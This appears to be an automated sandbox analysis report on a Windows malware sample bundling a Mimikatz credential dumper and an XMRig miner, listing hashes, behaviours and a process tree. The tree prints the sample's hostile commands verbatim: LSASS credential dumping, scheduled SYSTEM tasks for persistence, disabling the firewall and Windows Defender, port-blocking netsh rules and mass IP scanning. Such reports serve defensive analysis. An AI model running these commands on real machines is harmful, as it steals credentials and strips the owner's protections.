Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
15-11-2024 15:14
General
-
Target
bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe
-
Size
9.2MB
-
MD5
a5e4bba72c378a9e27d1933eee650bbc
-
SHA1
0227bb44b954ba431f566ea09481af091197dec2
-
SHA256
bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c
-
SHA512
ce33241e168e693ebc28f154a6bfe48ad7ce33077a2df664b91b45f4b130347a9b421c0c79ca518c33ed64e3ea859e2069a53ff099f5206670dd59d6f3c6abc0
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaah:I6mknGzwHdOgEPHd9BbX/nivPlTXTYrj
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (4367) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 7 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 28 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 32 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\vuctsdlau\indtey.exe"C:\Windows\TEMP\vuctsdlau\indtey.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe"C:\Users\Admin\AppData\Local\Temp\bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\uqrutnuy\zghnuwi.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\uqrutnuy\zghnuwi.exeC:\Windows\uqrutnuy\zghnuwi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\uqrutnuy\zghnuwi.exeC:\Windows\uqrutnuy\zghnuwi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\rtbnheisb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\bliinatya\rtbnheisb\wpcap.exeC:\Windows\bliinatya\rtbnheisb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\rtbnheisb\igadlieeu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bliinatya\rtbnheisb\Scant.txt2⤵
-
C:\Windows\bliinatya\rtbnheisb\igadlieeu.exeC:\Windows\bliinatya\rtbnheisb\igadlieeu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bliinatya\rtbnheisb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\bliinatya\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bliinatya\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\bliinatya\Corporate\vfshost.exeC:\Windows\bliinatya\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mirluebfi" /ru system /tr "cmd /c C:\Windows\ime\zghnuwi.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mirluebfi" /ru system /tr "cmd /c C:\Windows\ime\zghnuwi.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "glrfuunmi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uqrutnuy\zghnuwi.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "glrfuunmi" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uqrutnuy\zghnuwi.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bguydwsli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vuctsdlau\indtey.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bguydwsli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vuctsdlau\indtey.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 788 C:\Windows\TEMP\bliinatya\788.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 64 C:\Windows\TEMP\bliinatya\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 1828 C:\Windows\TEMP\bliinatya\1828.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 2620 C:\Windows\TEMP\bliinatya\2620.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 2840 C:\Windows\TEMP\bliinatya\2840.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 2888 C:\Windows\TEMP\bliinatya\2888.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 3076 C:\Windows\TEMP\bliinatya\3076.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 3892 C:\Windows\TEMP\bliinatya\3892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 4056 C:\Windows\TEMP\bliinatya\4056.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 700 C:\Windows\TEMP\bliinatya\700.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 432 C:\Windows\TEMP\bliinatya\432.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 1888 C:\Windows\TEMP\bliinatya\1888.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 4148 C:\Windows\TEMP\bliinatya\4148.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 2776 C:\Windows\TEMP\bliinatya\2776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 4820 C:\Windows\TEMP\bliinatya\4820.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 1332 C:\Windows\TEMP\bliinatya\1332.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 436 C:\Windows\TEMP\bliinatya\436.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\bliinatya\eqelmsiua.exeC:\Windows\TEMP\bliinatya\eqelmsiua.exe -accepteula -mp 3484 C:\Windows\TEMP\bliinatya\3484.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\bliinatya\rtbnheisb\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\bliinatya\rtbnheisb\hqnaebagm.exehqnaebagm.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\yqiwma.exeC:\Windows\SysWOW64\yqiwma.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vuctsdlau\indtey.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\vuctsdlau\indtey.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uqrutnuy\zghnuwi.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\uqrutnuy\zghnuwi.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\zghnuwi.exe1⤵
-
C:\Windows\ime\zghnuwi.exeC:\Windows\ime\zghnuwi.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.1MB
MD5c9499c65b35d79b5805f6e357ef40a66
SHA1059db9690b7a47b2779bc6bb10710956994015e3
SHA25688bf3dcd1553d1e97781675f76fc8f99ca5434b43519ad94992720aae36cc5e2
SHA51233f26b4431d725fbe3d876b4f8aaff3b844d6ff855a6324a3f50e553aea3c409fb00a76350aadd4a79c47f2f8f343010f819d6d27aab842736f2ffd17a714fbf
-
Filesize
26.5MB
MD5feaea64bda48020589e7be3feba7cb6f
SHA1b5500b1e250abb47eb2d13a027b4f465847b6614
SHA256783b71f28f5dd55f370530cf6e1ab1caba8a864714eead9e1597a0ac43e7b88a
SHA512287b2720d579a4577a197ac09280a00dbc32c9a8c4bab7fd29daf5436a963b393340b12e1b6b7d21ad7ec54b98058a1bbe669ccd8ea8485f0fab237fe74a4ec1
-
Filesize
3.6MB
MD5d107ec1c2a8d55b4721bd32760ff2aed
SHA14207b2a94d746d178a19a9f9ee95ad05a2a8e403
SHA256f850529604bed306df84511f6b384e1e5f61f44f01d348462f36f7560fb43fc2
SHA512bd1be18bb830471a005fc1d038679698106d02fe28eb989c91cae77d7e45d5acadeb36d07a1d46b5c176199ec4fb46b6138eab835b3cd3e7f644678bc7357a94
-
Filesize
8.6MB
MD5dfe893d859ca1b76ee46b6a71d6fb9ee
SHA1894726079b0b2324c40748072aefcf03b7de8134
SHA256884799ee7fcc2d364295bfd315b528d4707aa6bd898f137fae5a1f21bfb1933f
SHA5121e198cc185ceb0fe416c64dc4e0b77afcc00e576cfa922b7f89d2595874b65cf955c676b914f0d308a4f231b3efe8524442ff8a7eb9d081dd87eb35f1655e485
-
Filesize
3.0MB
MD5142916c1b57e47890d55dd80c0fb4dfb
SHA1f1785639944a5e80a6f63d74602bfdc25b49935a
SHA256ceecb4d009f3e26cfdf8bbae82063bc92d313d9e34287c4f6d561dc3a62b3da2
SHA512700ebaba3f773831691e93a3029f06f124204acc38c918597080ad2992cd60cd3867d4c4e5e4cf71a073968d9975c86175270ac1fdb4e4a87b3bca1ed6d3eb1b
-
Filesize
7.5MB
MD5b07159e8763597f8ee5457a32f853ff1
SHA1ab8ac851146bef876e3caa835415bfb7d42256d5
SHA256d7a01e0cbd75db4137f55a1a4664a31c30630a4c83aed48de5fc5e28af195fbd
SHA512ebd26d6803978fa3b414330663f1ed249bcceac18d1e4917f8c76248901a4799ac634122e5695d3a9c1832c108ad91b81c20d7cd29d504a95d3fd4e551233e3f
-
Filesize
814KB
MD5ad86ad7567b974c2c7461c4fcc3277ba
SHA1e6c03246fac777390c1640366281320302f99164
SHA256b59b7a2cb139aab41227594caea461428345e4ba967656a29779c2ece846980e
SHA5128165f1b2a8ea9208ad0272f629ee81ee60c09354c0a44a9f5ae3a15a12300719268d3f360e29dd71ee6d2426c6b1644edaf202195287388bc96404fa3846cb78
-
Filesize
2.5MB
MD50f3bae23e7abff46714c6ca7bd523571
SHA11d1b2be84fdbe8b700238bddcea2a7ee578fff3a
SHA25642430df863432da53616ee83bc8b25fb7689289eb8af9ab28914f1371b9cb46d
SHA5125487f141699882348d2b1b7d95ba437f5c3f596a80e5d8c9bc9fdaf55e99335132c861b74712fec4afeb719d24f37e00322b0110b0f43ead272136198773581e
-
Filesize
20.6MB
MD58f6e7c784c520c1a684b93009a25b24a
SHA11c56586348e3603a791a4a83ae71eb1e3eaf836e
SHA25619955c5b3a2522ebabe353fef44aacc5e1569e401ded1a2975f97f965c858be8
